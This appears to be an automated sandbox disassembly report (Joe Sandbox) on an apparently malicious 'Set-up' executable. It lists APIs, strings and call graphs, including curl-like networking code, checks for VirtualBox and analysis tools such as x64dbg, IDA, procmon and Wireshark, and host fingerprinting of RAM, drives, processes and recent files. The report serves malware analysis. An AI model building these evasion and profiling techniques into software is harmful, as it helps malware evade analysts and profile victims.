cbad45 97609->97613 97618 cbadea WSAGetLastError 97609->97618 97707 cb6be0 171 API calls 97609->97707 97610 cbb07b 97718 cc4f40 52 API calls 97610->97718 97612->97543 97619 cbaeb8 97612->97619 97620 cbae8e 97612->97620 97622 cbad5f 97613->97622 97623 cbade6 97613->97623 97614 cbaff8 htons bind 97614->97606 97614->97633 97706 c9d090 66 API calls 97615->97706 97711 c9d090 66 API calls 97618->97711 97714 ce45c0 12 API calls 97619->97714 97620->97599 97629 cbae93 strchr 97620->97629 97708 cd20d0 58 API calls 97622->97708 97623->97618 97625 cbb08b 97625->97543 97634 cbaead 97629->97634 97631 cbad7b 97636 cbadb7 97631->97636 97709 cc4fd0 51 API calls 97631->97709 97632 cbad01 97712 cc4f40 52 API calls 97632->97712 97633->97607 97633->97614 97716 cc4fd0 51 API calls 97633->97716 97719 ce45c0 12 API calls 97634->97719 97635 cbaecc 97635->97596 97635->97599 97710 cd3030 50 API calls 97636->97710 97641 cbb0bf 97641->97602 97642 cbb0ca htons 97641->97642 97642->97602 97643 cbb0e5 strtoul 97642->97643 97643->97602 97645 cba15f 97644->97645 97646 cb8c4d 97644->97646 97645->97646 97647 cba181 getsockname 97645->97647 97646->97537 97658 cc50a0 51 API calls 97646->97658 97648 cba1d0 WSAGetLastError 97647->97648 97649 cba1f7 97647->97649 97726 c9d090 66 API calls 97648->97726 97651 cbef30 60 API calls 97649->97651 97653 cba20f 97651->97653 97652 cba1eb 97728 cc4f40 52 API calls 97652->97728 97653->97646 97654 cba216 _errno _errno 97653->97654 97727 c9d090 66 API calls 97654->97727 97657->97505 97658->97537 97659->97534 97660->97499 97661->97534 97662->97532 97663->97509 97664->97523 97666 c878dc 97665->97666 97667 c878c5 97665->97667 97666->97499 97729 c872a0 50 API calls 97667->97729 97669 c878d7 97669->97666 97671 c87607 socket 97670->97671 97672 c875ef 97670->97672 97673 c8762b 97671->97673 97674 c8763f 97671->97674 97672->97671 97675 c87601 97672->97675 97676 c87643 97672->97676 97720 c872a0 50 API calls 97673->97720 97674->97542 97675->97671 97721 c872a0 50 API calls 97676->97721 97678 c8763a 97678->97674 97680 c87654 __acrt_iob_func 97722 c8cb20 78 API calls 97680->97722 97682 c87674 fflush _errno 97682->97542 97684 cbefa8 97683->97684 97685 cbef47 97683->97685 97689 cbefc0 97684->97689 97725 c8c960 49 API calls 97684->97725 97686 cbef81 97685->97686 97690 cbef4c 97685->97690 97724 ce3d10 58 API calls 97686->97724 97689->97549 97691 cbef66 _errno 97690->97691 97723 ce3d10 58 API calls 97690->97723 97691->97549 97692 cbef5f 97692->97691 97694 cbef96 htons 97692->97694 97694->97689 97695->97588 97696->97556 97697->97543 97698->97544 97699->97547 97700->97554 97701->97584 97702->97563 97703->97583 97704->97574 97705->97589 97706->97632 97707->97613 97708->97631 97709->97636 97710->97612 97711->97632 97712->97543 97713->97609 97714->97635 97715->97605 97716->97633 97717->97610 97718->97625 97719->97641 97720->97678 97721->97680 97722->97682 97723->97692 97724->97692 97725->97689 97726->97652 97727->97652 97728->97646 97729->97669 97915 eb3170 24 API calls 97917 ddd940 187 API calls 97918 fd9d60 18 API calls 97919 ef4d70 80 API calls 97920 c83357 398 API calls 97921 d38f70 87 API calls 96104 c8116c 96105 c81430 GetStartupInfoA 96104->96105 96106 c81190 96104->96106 96107 c81448 _cexit 96105->96107 96108 c811ca 96106->96108 96109 c811b0 Sleep 96106->96109 96110 c811da 96108->96110 96111 c813e3 96108->96111 96109->96106 96113 c81460 _initterm 96110->96113 96114 c811e7 96110->96114 96157 1008a20 143 API calls 96111->96157 96116 c81483 exit 96113->96116 96115 c813fd _initterm 96114->96115 96119 c811ff 96114->96119 96115->96119 96134 10093e0 96119->96134 96120 c81231 SetUnhandledExceptionFilter _set_invalid_parameter_handler 96148 1009210 96120->96148 96122 c81257 __p__acmdln 96124 c8126e malloc 96122->96124 96124->96116 96125 c81300 96124->96125 96126 c81318 strlen malloc memcpy 96125->96126 96126->96126 96127 c8134e 96126->96127 96149 1009060 96127->96149 96129 c81367 96154 115bb60 96129->96154 96143 1009400 96134->96143 96147 10093f3 96134->96147 96135 1009688 96136 1009699 96135->96136 96135->96147 96138 10096c7 96136->96138 96158 1009280 13 API calls 96136->96158 96159 1009220 13 API calls 96138->96159 96140 10096df 96140->96120 96141 1009280 13 API calls 96144 10094e2 96141->96144 96142 1009220 13 API calls 96142->96144 96143->96135 96143->96138 96143->96144 96145 10095b8 96143->96145 96143->96147 96144->96141 96144->96142 96144->96143 96146 10095ea VirtualProtect 96145->96146 96145->96147 96146->96145 96147->96120 96148->96122 96150 1009069 96149->96150 96152 1009000 96149->96152 96150->96129 96160 c814c0 _crt_atexit 96152->96160 96153 1009030 96153->96129 96155 1009060 _crt_atexit 96154->96155 96156 115bb96 96155->96156 96157->96114 96158->96136 96159->96140 96160->96153 97922 c85f60 107 API calls 97923 c98760 54 API calls 97924 c9e760 264 API calls 97925 ec1b40 52 API calls 97927 df2570 23 API calls 97928 d1b960 _assert _assert _assert 97931 d79360 87 API calls 97933 ca0970 88 API calls 97934 c83308 65 API calls 97935 d48710 6 API calls 97937 c8230e 461 API calls 97938 d80310 memcpy 97939 c9e300 341 API calls 97940 c93900 51 API calls 96855 cbf100 96856 cbf11f 96855->96856 96869 cbf1b8 96855->96869 96858 c9d8c0 2 API calls 96856->96858 96856->96869 96891 cbf603 96856->96891 96857 c9d8c0 2 API calls 96857->96891 96859 cbf168 96858->96859 96861 cbf2a3 96859->96861 96862 cbf240 96859->96862 96898 cc4f40 52 API calls 96861->96898 96864 c9d8c0 2 API calls 96862->96864 96863 cbff5b 96885 cbff79 96863->96885 96905 c954e0 QueryPerformanceCounter GetTickCount 96863->96905 96883 cbf24e 96864->96883 96866 cbf80d 96867 cbff1a 96904 cc0c80 50 API calls 96867->96904 96870 cbf754 WSASetLastError 96870->96891 96871 cc010d 96875 cc015e 96871->96875 96909 cc50a0 51 API calls 96871->96909 96872 cc50a0 51 API calls 96872->96891 96874 cc008a 96907 cc4f40 52 API calls 96874->96907 96878 cc004d 96875->96878 96910 cc50a0 51 API calls 96875->96910 96877 cc0045 96877->96869 96877->96871 96877->96878 96908 cc50a0 51 API calls 96877->96908 96911 cc4f40 52 API calls 96878->96911 96880 c87310 82 API calls 96890 cbf3ce 96880->96890 96883->96869 96883->96880 96885->96869 96906 cc50a0 51 API calls 96885->96906 96886 cbf491 96889 c87310 82 API calls 96886->96889 96886->96891 96896 cbf50d 96889->96896 96890->96869 96890->96886 96899 cc50a0 51 API calls 96890->96899 96891->96857 96891->96866 96891->96867 96891->96870 96891->96872 96891->96874 96891->96877 96892 cc0d30 54 API calls 96891->96892 96902 c8fa50 53 API calls 96891->96902 96903 cc4fd0 51 API calls 96891->96903 96892->96891 96894 cbf5b9 96901 c8fa50 53 API calls 96894->96901 96896->96869 96896->96894 96900 cc50a0 51 API calls 96896->96900 96898->96869 96899->96886 96900->96894 96901->96891 96902->96891 96903->96891 96904->96863 96905->96885 96906->96869 96907->96869 96908->96871 96909->96875 96910->96878 96911->96869 97942 ce6d00 95 API calls 97943 d4b900 18 API calls 97944 eee138 85 API calls 97945 e60930 21 API calls 97946 d7b300 195 API calls 97947 cca110 116 API calls 97948 fc5320 97 API calls 97949 cd2110 _time64 97747 c82f17 97748 1155ff0 5 API calls 97747->97748 97749 c82f2c 97748->97749 97750 11563e0 13 API calls 97749->97750 97763 c82f49 97750->97763 97751 c831d3 97754 c8315c RegEnumKeyExA 97754->97763 97755 c81619 32 API calls 97756 c83046 RegOpenKeyExA 97755->97756 97757 c83089 RegQueryValueExA 97756->97757 97756->97763 97758 c8313b RegCloseKey 97757->97758 97757->97763 97758->97763 97759 11562c0 7 API calls 97759->97763 97761 11561f0 malloc 97761->97763 97762 11563e0 13 API calls 97762->97763 97763->97751 97763->97754 97763->97755 97763->97758 97763->97759 97763->97761 97763->97762 97764 c81619 97763->97764 97767 1156350 strlen 97763->97767 97765 1011360 32 API calls 97764->97765 97766 c81645 RegOpenKeyExA 97765->97766 97766->97763 97951 d03b30 86 API calls 97952 d1a330 20 API calls 97955 d24920 14 API calls 97130 e5d910 97131 e5d91d 97130->97131 97136 e5ca40 97130->97136 97149 e5ca40 45 API calls 97131->97149 97132 e5ca5b 97138 e5caac 97132->97138 97140 e5ca71 97132->97140 97134 e5d92e 97135 e5ca75 97136->97132 97136->97135 97137 e5ca8b malloc 97136->97137 97137->97138 97139 e5ca98 memset 97137->97139 97138->97135 97146 e37120 20 API calls 97138->97146 97140->97135 97140->97139 97142 e5cab7 97147 e37220 20 API calls 97142->97147 97144 e5cac0 97148 e37310 20 API calls 97144->97148 97146->97142 97147->97144 97148->97135 97149->97134 97957 fcab00 62 API calls 97958 ec1f10 48 API calls 97959 ddbb20 128 API calls
                                    APIs
                                      • Part of subcall function 00C9D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,00C901B1), ref: 00C9D8E2
                                    • setsockopt.WS2_32(?,00000029,0000001B,00000000,00000004), ref: 00CBA670
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CBA6A1
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CBA6AB
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CBA6AF
                                      • Part of subcall function 00C9D090: GetLastError.KERNEL32 ref: 00C9D0A1
                                      • Part of subcall function 00C9D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C9D0A9
                                      • Part of subcall function 00C9D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C9D0CD
                                      • Part of subcall function 00C9D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C9D0D7
                                      • Part of subcall function 00C9D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 00C9D381
                                      • Part of subcall function 00C9D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 00C9D3A2
                                      • Part of subcall function 00C9D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C9D3BF
                                      • Part of subcall function 00C9D090: GetLastError.KERNEL32 ref: 00C9D3C9
                                      • Part of subcall function 00C9D090: SetLastError.KERNEL32(00000000), ref: 00C9D3D4
                                      • Part of subcall function 00CC4F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00CC4F9E
                                    • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00CBA831
                                    • WSAGetLastError.WS2_32 ref: 00CBA854
                                    • getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00CBA97A
                                    • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 00CBA9A6
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CBAB0F
                                    • htons.WS2_32(?), ref: 00CBAC01
                                    • getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00CBAC38
                                    • setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 00CBAC64
                                    • WSAGetLastError.WS2_32 ref: 00CBACDC
                                    • WSAGetLastError.WS2_32 ref: 00CBADF5
                                    • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000025), ref: 00CBAE9D
                                    • htons.WS2_32(?), ref: 00CBAEDB
                                    • bind.WS2_32(?,00000002,00000010), ref: 00CBAEF5
                                    • WSAGetLastError.WS2_32 ref: 00CBAFB9
                                    • htons.WS2_32(?), ref: 00CBAFFC
                                    • bind.WS2_32(?,?,?), ref: 00CBB014
                                    • WSAGetLastError.WS2_32 ref: 00CBB056
                                    • htons.WS2_32(?), ref: 00CBB0D2
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,0000000A), ref: 00CBB0EA
                                    Strings
                                    • bind failed with errno %d: %s, xrefs: 00CBB080
                                    • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00CBAD0A
                                    • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00CBA6CE
                                    • Name '%s' family %i resolved to '%s' family %i, xrefs: 00CBADAC
                                    • cf_socket_open() -> %d, fd=%d, xrefs: 00CBA796
                                    • Local port: %hu, xrefs: 00CBAF28
                                    • cf-socket.c, xrefs: 00CBA5CD, 00CBA735
                                    • Could not set TCP_NODELAY: %s, xrefs: 00CBA871
                                    • @, xrefs: 00CBA8F4
                                    • Local Interface %s is ip %s using address family %i, xrefs: 00CBAE60
                                    • Bind to local port %d failed, trying next, xrefs: 00CBAFE5
                                    • @, xrefs: 00CBAC42
                                    • Couldn't bind to '%s' with errno %d: %s, xrefs: 00CBAE1F
                                    • Trying %s:%d..., xrefs: 00CBA7C2, 00CBA7DE
                                    • Trying [%s]:%d..., xrefs: 00CBA689
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_errno$htonssetsockopt$bindgetsockoptstrrchr$CounterPerformanceQuery__sys_errlist__sys_nerrstrchrstrcpystrlenstrtoul
                                    • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                    • API String ID: 2815861332-2373386790
                                    • Opcode ID: bca7bb88118cbc239f91d8b072f43c90a5286bb212fbf01e09883e8db6275a5b
                                    • Instruction ID: 4b3299fe31ef7dec704a93dec71490957a7afb53d3b70fd67f13324d6ab9a25e
                                    • Opcode Fuzzy Hash: bca7bb88118cbc239f91d8b072f43c90a5286bb212fbf01e09883e8db6275a5b
                                    • Instruction Fuzzy Hash: 7B62E071508381ABE7208F24C846BEBB7F8BF95304F04492DF99997292E771E945CB93

                                    Control-flow Graph

                                    APIs
                                    • FindFirstFileA.KERNELBASE ref: 00C82A27
                                    • RegOpenKeyExA.KERNELBASE ref: 00C82A8A
                                    • CharUpperA.USER32 ref: 00C82AEF
                                    • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00C82B05
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00C82B6D
                                    • Process32First.KERNEL32 ref: 00C82B88
                                    • Process32Next.KERNEL32 ref: 00C82BC0
                                    • QueryFullProcessImageNameA.KERNELBASE ref: 00C82C26
                                    • CloseHandle.KERNELBASE ref: 00C82C49
                                    • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00C82C5F
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00C82CC4
                                    • Process32First.KERNEL32 ref: 00C82CDF
                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00C82D0D
                                    • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00C82D42
                                    • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00C82D5C
                                    • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00C82D76
                                    • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00C82D90
                                    • Process32Next.KERNEL32 ref: 00C82DBF
                                    • CloseHandle.KERNELBASE ref: 00C82DFC
                                    • EnumWindows.USER32 ref: 00C82E21
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strstr$Process32$First$CloseCreateHandleNextSnapshotToolhelp32$CharEnumFileFindFullImageNameOpenProcessQueryUpperWindowsstrncpy
                                    • String ID: 0$C:\USERS\PUBLIC\$C:\Windows\System32\VBox*.dll$SYSTEM\ControlSet001\Services\VBoxSF$WINDBG.EXE$dbg$dbg_sec$dbg_third$ida.exe$procmon.exe$public_check$vbox_first$vbox_second$wireshark.exe$x64dbg.exe$yadro
                                    • API String ID: 515599682-3783588604
                                    • Opcode ID: 53d9dcd66b3f8d5a75b5cd315f09cca0e9d886c5c0d6aee114d6fc21c84c37a1
                                    • Instruction ID: bdb082afe548efc0113f3574f30ba580890d7a820e771810e15cc8d479ac20bc
                                    • Opcode Fuzzy Hash: 53d9dcd66b3f8d5a75b5cd315f09cca0e9d886c5c0d6aee114d6fc21c84c37a1
                                    • Instruction Fuzzy Hash: 9EE1D4B4905305DFDB54EF69DA8469EBBF4AF84304F40886AE998E7344E734DA48CF42

                                    Control-flow Graph

                                    APIs
                                    • GetSystemInfo.KERNELBASE ref: 00C82579
                                      • Part of subcall function 011561F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00C82589), ref: 01156205
                                    • GlobalMemoryStatusEx.KERNELBASE ref: 00C825CC
                                    • GetLogicalDriveStringsA.KERNEL32 ref: 00C82619
                                    • GetDriveTypeA.KERNELBASE ref: 00C82647
                                    • GetDiskFreeSpaceExA.KERNELBASE ref: 00C8267E
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00C82749
                                    • KiUserCallbackDispatcher.NTDLL ref: 00C827E2
                                    • SHGetKnownFolderPath.SHELL32 ref: 00C8286D
                                    • wcscpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00C828BE
                                    • wcscat.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00C828D4
                                    • FindFirstFileW.KERNELBASE ref: 00C828F8
                                    • FindNextFileW.KERNELBASE ref: 00C8291F
                                    • K32EnumProcesses.KERNEL32 ref: 00C8296F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: DriveFileFind$CallbackDiskDispatcherEnumFirstFolderFreeGlobalInfoKnownLogicalMemoryNextPathProcessesSpaceStatusStringsSystemTypeUsermallocstrlenwcscatwcscpy
                                    • String ID: @$Num_displays$Num_processor$Num_ram$`$all$drivers$free$name$processes$recent_files$resolution_x$resolution_y$uptime_minutes
                                    • API String ID: 2116500361-3337672980
                                    • Opcode ID: e7dcc49943abb15a1d3bda3ebcb353191f11dc151f94cf9222bdf4bdf17bc462
                                    • Instruction ID: 34735159a94cee5e9ad2bfb92cd6db841870782c73830af2c896a393e38a49cd
                                    • Opcode Fuzzy Hash: e7dcc49943abb15a1d3bda3ebcb353191f11dc151f94cf9222bdf4bdf17bc462
                                    • Instruction Fuzzy Hash: 9BD1A3B49047099FCB54EF68C98469EBBF4FF58344F40896DE8A897344E7349A84CF92
                                    APIs
                                    • WSASetLastError.WS2_32(?), ref: 00CBF75B
                                      • Part of subcall function 00C9D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,00C901B1), ref: 00C9D8E2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: CounterErrorLastPerformanceQuery
                                    • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                    • API String ID: 1297246462-1590685507
                                    • Opcode ID: 22cdaa969006c78bc0a6f7c400e3736b32d510c4f352ac9c338fbf8a9ec3f130
                                    • Instruction ID: 77838f2af6e21cc21cd16ea8bdfce91792af3ad4b9e7b4f0f63d653bd749220d
                                    • Opcode Fuzzy Hash: 22cdaa969006c78bc0a6f7c400e3736b32d510c4f352ac9c338fbf8a9ec3f130
                                    • Instruction Fuzzy Hash: 92C28F31A043449FD724CF29C884BAAB7E1BF84314F15866DEC999B362D771EE85CB81

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1247 d4aa30-d4aa64 1249 d4ab04-d4ab09 1247->1249 1250 d4aa6a-d4aaa7 call d3e730 1247->1250 1251 d4ae80-d4ae89 1249->1251 1254 d4ab0e-d4ab13 1250->1254 1255 d4aaa9-d4aabd 1250->1255 1258 d4ae2e 1254->1258 1256 d4aabf-d4aac7 1255->1256 1257 d4ab18-d4ab50 htons 1255->1257 1256->1258 1259 d4aacd-d4ab02 htons 1256->1259 1260 d4ab58-d4ab6d 1257->1260 1261 d4ae30-d4ae4a call d3ea60 call d3ebf0 1258->1261 1259->1260 1262 d4ab96-d4abab socket 1260->1262 1263 d4ab6f-d4ab73 1260->1263 1276 d4ae75-d4ae7d 1261->1276 1277 d4ae4c-d4ae57 1261->1277 1262->1258 1267 d4abb1-d4abc5 1262->1267 1263->1262 1265 d4ab75-d4ab8f 1263->1265 1265->1267 1283 d4ab91 1265->1283 1269 d4abc7-d4abca 1267->1269 1270 d4abd0-d4abed ioctlsocket 1267->1270 1269->1270 1271 d4ad2e-d4ad39 1269->1271 1272 d4ac10-d4ac14 1270->1272 1273 d4abef-d4ac0a setsockopt 1270->1273 1278 d4ad52-d4ad56 1271->1278 1279 d4ad3b-d4ad4c 1271->1279 1281 d4ac16-d4ac31 setsockopt 1272->1281 1282 d4ac37-d4ac41 1272->1282 1273->1272 1280 d4ae29 1273->1280 1276->1251 1284 d4ae6e-d4ae6f closesocket 1277->1284 1285 d4ae59-d4ae5e 1277->1285 1278->1280 1286 d4ad5c-d4ad6b 1278->1286 1279->1278 1279->1280 1280->1258 1281->1280 1281->1282 1287 d4ac43-d4ac46 1282->1287 1288 d4ac7a-d4ac7e 1282->1288 1283->1258 1284->1276 1285->1284 1289 d4ae60-d4ae6c 1285->1289 1291 d4ad70-d4ad78 1286->1291 1292 d4ad04-d4ad08 1287->1292 1293 d4ac4c-d4ac51 1287->1293 1295 d4ace7-d4acfe setsockopt 1288->1295 1296 d4ac80-d4ac9b 1288->1296 1289->1276 1297 d4ada0-d4adad connect 1291->1297 1298 d4ad7a-d4ad7f 1291->1298 1292->1271 1301 d4ad0a-d4ad28 setsockopt 1292->1301 1293->1292 1299 d4ac57-d4ac78 htonl 1293->1299 1295->1292 1296->1295 1300 d4ac9d-d4acc1 1296->1300 1305 d4adb3-d4adcf WSAGetLastError 1297->1305 1298->1297 1303 d4ad81-d4ad99 1298->1303 1304 d4acc6-d4acd7 bind 1299->1304 1300->1304 1301->1271 1301->1280 1303->1305 1304->1280 1306 d4acdd-d4ace5 1304->1306 1307 d4add5-d4add8 1305->1307 1308 d4ae8a-d4ae91 1305->1308 1306->1292 1306->1295 1310 d4ade1-d4adf1 1307->1310 1311 d4adda-d4addf 1307->1311 1308->1261 1312 d4adf3-d4ae07 1310->1312 1313 d4ae0d-d4ae12 1310->1313 1311->1291 1311->1310 1312->1313 1318 d4aea8-d4aead 1312->1318 1314 d4ae14-d4ae17 1313->1314 1315 d4ae1a-d4ae1c call d4af70 1313->1315 1314->1315 1319 d4ae21-d4ae23 1315->1319 1318->1261 1320 d4ae25-d4ae27 1319->1320 1321 d4ae93-d4ae9d 1319->1321 1320->1261 1322 d4aeaf-d4aeb1 call d3e760 1321->1322 1323 d4ae9f-d4aea6 call d3e7c0 1321->1323 1326 d4aeb6-d4aebe 1322->1326 1323->1326 1328 d4aec0-d4aedb call d3e180 1326->1328 1329 